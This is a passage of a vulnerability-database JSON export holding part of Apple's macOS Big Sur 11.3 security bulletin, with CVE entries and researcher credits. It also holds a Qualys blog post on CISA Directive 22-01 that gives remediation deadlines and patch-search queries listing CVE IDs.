Security, CFF of Topsec Alpha Team, Jzhu working with Trend Micro Zero Day Initiative, Xingwei Lin of Ant Security Light-Year Lab, CFF of Topsec Alpha Team, Jeonghoon Shin (@singi21a) of THEORI working with Trend Micro Zero Day Initiative\n\nEntry added July 21, 2021 \n\n**Installer**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may bypass Gatekeeper checks\n\nDescription: This issue was addressed with improved handling of file metadata.\n\nCVE-2021-30658: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2021-1841: Jack Dates of RET2 Systems, Inc.\n\nCVE-2021-1834: ABC Research s.r.o. 
working with Trend Micro Zero Day Initiative\n\n**Kernel**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may be able to disclose kernel memory\n\nDescription: A memory initialization issue was addressed with improved memory handling.\n\nCVE-2021-1860: @0xalsr\n\n**Kernel**\n\nAvailable for: macOS Big Sur\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2021-1840: Zuozhi Fan (@pattern_F_) of Ant Group Tianqiong Security Lab\n\n**Kernel**\n\nAvailable for: macOS Big Sur\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1851: @0xalsr\n\n**Kernel**\n\nAvailable for: macOS Big Sur\n\nImpact: Copied files may not have the expected file permissions\n\nDescription: The issue was addressed with improved permissions logic.\n\nCVE-2021-1832: an anonymous researcher\n\n**Kernel**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may be able to disclose kernel memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-30660: Alex Plaskett\n\n**libxpc**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may be able to gain root privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2021-30652: James Hutchins\n\n**libxslt**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing a maliciously crafted file may lead to heap corruption\n\nDescription: A double free issue was addressed with improved memory management.\n\nCVE-2021-1875: Found by OSS-Fuzz\n\n**Login Window**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application with root privileges may be able to access private information\n\nDescription: This issue was addressed with improved entitlements.\n\nCVE-2021-1824: Wojciech Regu\u0142a (@_r3ggi) of 
SecuRing\n\n**Notes**\n\nAvailable for: macOS Big Sur\n\nImpact: Locked Notes content may have been unexpectedly unlocked\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1859: Syed Ali Shuja (@SyedAliShuja) of Colour King Pvt. Ltd\n\n**NSRemoteView**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2021-1876: Matthew Denton of Google Chrome\n\n**Preferences**\n\nAvailable for: macOS Big Sur\n\nImpact: A local user may be able to modify protected parts of the file system\n\nDescription: A parsing issue in the handling of directory paths was addressed with improved path validation.\n\nCVE-2021-1815: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com)\n\nCVE-2021-1739: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com)\n\nCVE-2021-1740: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com)\n\n**Safari**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious website may be able to track users by setting state in a cache\n\nDescription: An issue existed in determining cache occupancy. 
The issue was addressed through improved logic.\n\nCVE-2021-1861: Konstantinos Solomos of University of Illinois at Chicago\n\n**Safari**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious website may be able to force unnecessary network connections to fetch its favicon\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1855: H\u00e5vard Mikkelsen Ottestad of HASMAC AS\n\n**SampleAnalysis**\n\nAvailable for: macOS Big Sur\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1868: Tim Michaud of Zoom Communications\n\n**Sandbox**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may be able to access the user's recent contacts\n\nDescription: The issue was addressed with improved permissions logic.\n\nCVE-2021-30750: Csaba Fitzl (@theevilbit) of Offensive Security\n\nEntry added May 28, 2021\n\n**smbx**\n\nAvailable for: macOS Big Sur\n\nImpact: An attacker in a privileged network position may be able to leak sensitive user information\n\nDescription: An integer overflow was addressed with improved input validation.\n\nCVE-2021-1878: Aleksandar Nikolic of Cisco Talos (talosintelligence.com)\n\n**System Preferences**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may bypass Gatekeeper checks. 
Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-30657: Cedric Owens (@cedowens)\n\nEntry added April 27, 2021, updated April 30, 2021\n\n**TCC**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious unsandboxed app on a system with Remote Login enabled may bypass Privacy preferences\n\nDescription: This issue was addressed by adding a new Remote Login option for opting into Full Disk Access for Secure Shell sessions.\n\nCVE-2021-30856: Csaba Fitzl (@theevilbit) of Offensive Security, Andy Grant of Zoom Video Communications, Thijs Alkemade of Computest Research Division, Wojciech Regu\u0142a of SecuRing (wojciechregula.blog), Cody Thomas of SpecterOps, Mickey Jin of Trend Micro\n\nEntry added January 19, 2022, updated May 25, 2022 \n\n**tcpdump**\n\nAvailable for: macOS Big Sur\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2020-8037: an anonymous researcher\n\n**Time Machine**\n\nAvailable for: macOS Big Sur\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: The issue was addressed with improved permissions logic.\n\nCVE-2021-1839: Tim Michaud(@TimGMichaud) of Zoom Video Communications and Gary Nield of ECSC Group plc\n\n**WebKit**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing maliciously crafted web content may lead to a cross site scripting attack\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2021-1825: Alex Camboe of Aon\u2019s Cyber Solutions\n\n**WebKit**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2021-1817: zhunki\n\nEntry updated May 6, 2021\n\n**WebKit**\n\nAvailable for: macOS Big 
Sur\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2021-1826: an anonymous researcher\n\n**WebKit**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: A memory initialization issue was addressed with improved memory handling.\n\nCVE-2021-1820: Andr\u00e9 Bargull\n\nEntry updated May 6, 2021\n\n**WebKit Storage**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2021-30661: yangkang(@dnpushme) of 360 ATA\n\n**WebRTC**\n\nAvailable for: macOS Big Sur\n\nImpact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2020-7463: Megan2013678\n\n**Wi-Fi**\n\nAvailable for: macOS Big Sur\n\nImpact: An application may be able to cause unexpected system termination or write kernel memory\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2021-1828: Zuozhi Fan (@pattern_F_) of Ant Group Tianqiong Security Lab\n\n**Wi-Fi**\n\nAvailable for: macOS Big Sur\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A type confusion issue was addressed with improved state handling.\n\nCVE-2021-1829: Tielei Wang of Pangu Lab\n\n**Wi-Fi**\n\nAvailable for: macOS Big Sur\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: The issue was addressed with improved permissions logic.\n\nCVE-2021-30655: Gary Nield of ECSC Group plc and Tim Michaud(@TimGMichaud) of 
Zoom Video Communications and Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\n**Wi-Fi**\n\nAvailable for: macOS Big Sur\n\nImpact: A buffer overflow may result in arbitrary code execution\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1770: Jiska Classen (@naehrdine) of Secure Mobile Networking Lab, TU Darmstadt\n\nEntry added July 21, 2021 \n\n**WindowServer**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may be able to unexpectedly leak a user's credentials from secure text fields\n\nDescription: An API issue in Accessibility TCC permissions was addressed with improved state management.\n\nCVE-2021-1873: an anonymous researcher\n\n\n\n## Additional recognition\n\n**AirDrop**\n\nWe would like to acknowledge @maxzks for their assistance.\n\nEntry added May 6, 2021\n\n**CoreAudio**\n\nWe would like to acknowledge an anonymous researcher for their assistance.\n\nEntry added May 6, 2021\n\n**CoreCrypto**\n\nWe would like to acknowledge Andy Russon of Orange Group for their assistance.\n\nEntry added May 6, 2021\n\n**File Bookmark**\n\nWe would like to acknowledge an anonymous researcher for their assistance.\n\nEntry added May 6, 2021\n\n**Foundation**\n\nWe would like to acknowledge CodeColorist of Ant-Financial LightYear Labs for their assistance.\n\nEntry added May 6, 2021\n\n**Kernel**\n\nWe would like to acknowledge Antonio Frighetto of Politecnico di Milano, GRIMM, Keyu Man, Zhiyun Qian, Zhongjie Wang, Xiaofeng Zheng, Youjun Huang, Haixin Duan, Mikko Kentt\u00e4l\u00e4 ( @Turmio_ ) of SensorFu, and Proteas for their assistance.\n\nEntry added May 6, 2021\n\n**Mail**\n\nWe would like to acknowledge Petter Flink, SecOps of Bonnier News and an anonymous researcher for their assistance.\n\nEntry added May 6, 2021\n\n**Safari**\n\nWe would like to acknowledge Sahil Mehra (Nullr3x) & Shivam Kamboj Dattana (Sechunt3r) for their assistance.\n\nEntry added May 6, 2021\n\n**Security**\n\nWe would like to 
acknowledge Xingwei Lin of Ant Security Light-Year Lab and john (@nyan_satan) for their assistance.\n\nEntry added May 6, 2021\n\n**sysdiagnose**\n\nWe would like to acknowledge Tim Michaud (@TimGMichaud) of Leviathan for their assistance.\n\nEntry added May 6, 2021\n\n**WebKit**\n\nWe would like to acknowledge Emilio Cobos \u00c1lvarez of Mozilla for their assistance.\n\nEntry added May 6, 2021\n\n**WebSheet**\n\nWe would like to acknowledge Patrick Clover for their assistance.\n\nEntry added May 6, 2021\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: May 25, 2022\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-26T00:00:00", "type": "apple", "title": "About the security content of macOS Big Sur 11.3", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7463", "CVE-2020-8037", "CVE-2020-8284", "CVE-2020-8285", "CVE-2020-8286", "CVE-2021-1739", "CVE-2021-1740", "CVE-2021-1770", "CVE-2021-1784", "CVE-2021-1808", "CVE-2021-1809", "CVE-2021-1810", "CVE-2021-1811", "CVE-2021-1813", "CVE-2021-1814", "CVE-2021-1815", "CVE-2021-1817", "CVE-2021-1820", "CVE-2021-1824", "CVE-2021-1825", "CVE-2021-1826", "CVE-2021-1828", "CVE-2021-1829", "CVE-2021-1832", "CVE-2021-1834", "CVE-2021-1839", "CVE-2021-1840", "CVE-2021-1841", "CVE-2021-1843", "CVE-2021-1846", "CVE-2021-1847", "CVE-2021-1849", "CVE-2021-1851", "CVE-2021-1853", "CVE-2021-1855", "CVE-2021-1857", "CVE-2021-1858", "CVE-2021-1859", "CVE-2021-1860", "CVE-2021-1861", "CVE-2021-1867", "CVE-2021-1868", "CVE-2021-1872", "CVE-2021-1873", "CVE-2021-1875", "CVE-2021-1876", "CVE-2021-1878", "CVE-2021-1880", "CVE-2021-1881", "CVE-2021-1882", "CVE-2021-1883", "CVE-2021-1884", "CVE-2021-1885", "CVE-2021-30652", "CVE-2021-30653", "CVE-2021-30655", "CVE-2021-30657", "CVE-2021-30658", "CVE-2021-30659", "CVE-2021-30660", "CVE-2021-30661", "CVE-2021-30664", "CVE-2021-30743", "CVE-2021-30750", "CVE-2021-30752", "CVE-2021-30856"], "modified": "2021-04-26T00:00:00", "id": "APPLE:2A32C0762786DF36357D645066CDC600", "href": "https://support.apple.com/kb/HT212325", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2021-11-09T06:36:02", "description": "[Start your VMDR 30-day, no-cost trial today](<https://www.qualys.com/forms/vmdr/>)\n\n## Overview\n\nOn November 3, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>), "Reducing the Significant Risk of Known Exploited Vulnerabilities." 
[This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires agencies to review and update agency internal vulnerability management procedures within 60 days according to this directive and remediate each vulnerability according to the timelines outlined in 'CISA's vulnerability catalog.\n\nQualys helps customers to identify and assess risk to organizations' digital infrastructure and automate remediation. Qualys' guidance for rapid response to Operational Directive is below.\n\n## Directive Scope\n\nThis directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency's behalf.\n\nHowever, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA's public catalog.\n\n## CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [291 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. The Qualys Research team has mapped all these CVEs to applicable QIDs. You can view the complete list of CVEs and the corresponding QIDs [here](<https://success.qualys.com/discussions/s/article/000006791>).\n\n### Not all vulnerabilities are created equal\n\nOur quick review of the 291 CVEs posted by CISA suggests that not all vulnerabilities hold the same priority. CISA has ordered U.S. federal enterprises to apply patches as soon as possible. 
The remediation guidance can be grouped into three distinct categories:\n\n#### Category 1 \u2013 Past Due\n\nRemediation of 15 CVEs (~5%) are already past due. These vulnerabilities include some of the most significant exploits in the recent past, including PrintNightmare, SigRed, ZeroLogon, and vulnerabilities in CryptoAPI, Pulse Secure, and more. Qualys Patch Management can help you remediate most of these vulnerabilities.\n\n#### Category 2 \u2013 Patch in less than two weeks\n\n100 (34%) Vulnerabilities need to be patched in the next two weeks, or by **November 17, 2022**.\n\n#### Category 3 \u2013 Patch within six months\n\nThe remaining 176 vulnerabilities (60%) must be patched within the next six months or by **May 3, 2022**.\n\n## Detect CISA's Vulnerabilities Using Qualys VMDR\n\nThe Qualys Research team has released several remote and authenticated detections (QIDs) for the vulnerabilities. Since the directive includes 291 CVEs, we recommend executing your search based on vulnerability criticality, release date, or other categories.\n\nFor example, to detect critical CVEs released in 2021:\n\n_vulnerabilities.vulnerability.criticality:CRITICAL and vulnerabilities.vulnerability.cveIds:[ 
`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]_\n\n\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using the VMDR Prioritization report.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this 
vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to the CISA Known Exploited Vulnerabilities and gather your status and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of the status of the vulnerabilities in your environment using the ["CISA 2010-21| KNOWN EXPLOITED VULNERABILITIES"](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard:\n\n\n\n### Summary Dashboard High Level Structured by Vendor:\n\n\n\n## Remediation\n\nTo comply with this directive, federal agencies must remediate most "Category 2" vulnerabilities by **November 17, 2021**, and "Category 3" by May 3, 2021. Qualys Patch Management can help streamline the remediation of many of these vulnerabilities.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive's aggressive remediation date of November 17, 2021. Running this query will find all required patches and allow quick and efficient deployment of those missing patches to all assets directly from within the Qualys Cloud 
Platform.\n\ncve:[`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]\n\n\n\nQualys patch content covers many Microsoft, Linux, and third-party applications; however, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. 
The flexibility to customize patch deployment allows customers to patch the remaining CVEs in this list.\n\nNote that the due date for \u201cCategory 1\u201d patches has already passed. To find missing patches in your environment for \u201cCategory 1\u201d past due CVEs, copy the following query into the Patch Management app:\n\ncve:['CVE-2021-1732','CVE-2020-1350','CVE-2020-1472','CVE-2021-26855','CVE-2021-26858','CVE-2021-27065','CVE-2020-0601','CVE-2021-26857','CVE-2021-22893','CVE-2020-8243','CVE-2021-22900','CVE-2021-22894','CVE-2020-8260','CVE-2021-22899','CVE-2019-11510']\n\n\n\n## Federal Enterprises and Agencies Can Act Now\n\nFor federal enterprises and agencies, it's a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help them get there. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>).\n\nHere are a few steps Federal enterprises can take immediately:\n\n * Run vulnerability assessments against all your assets by leveraging various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Patch Management to apply patches and other configuration changes\n * Track remediation progress through Unified Dashboards\n\n## Summary\n\nUnderstanding vulnerabilities is a critical but only partial step in threat mitigation. Qualys VMDR helps customers discover, assess threats, assign risk, and remediate threats in one solution. Qualys customers rely on the accuracy of Qualys' threat intelligence to protect their digital environments and stay current with patch guidance. 
Using Qualys VMDR can help any organization efficiently respond to the CISA directive.\n\n## Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-09T06:15:01", "type": "qualysblog", "title": "Qualys Response to CISA Alert: Binding Operational Directive 22-01", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-0601", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-20016", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-22502", 
"CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22986", "CVE-2021-26084", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-28663", "CVE-2021-28664", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42258"], "modified": "2021-11-09T06:15:01", "id": "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}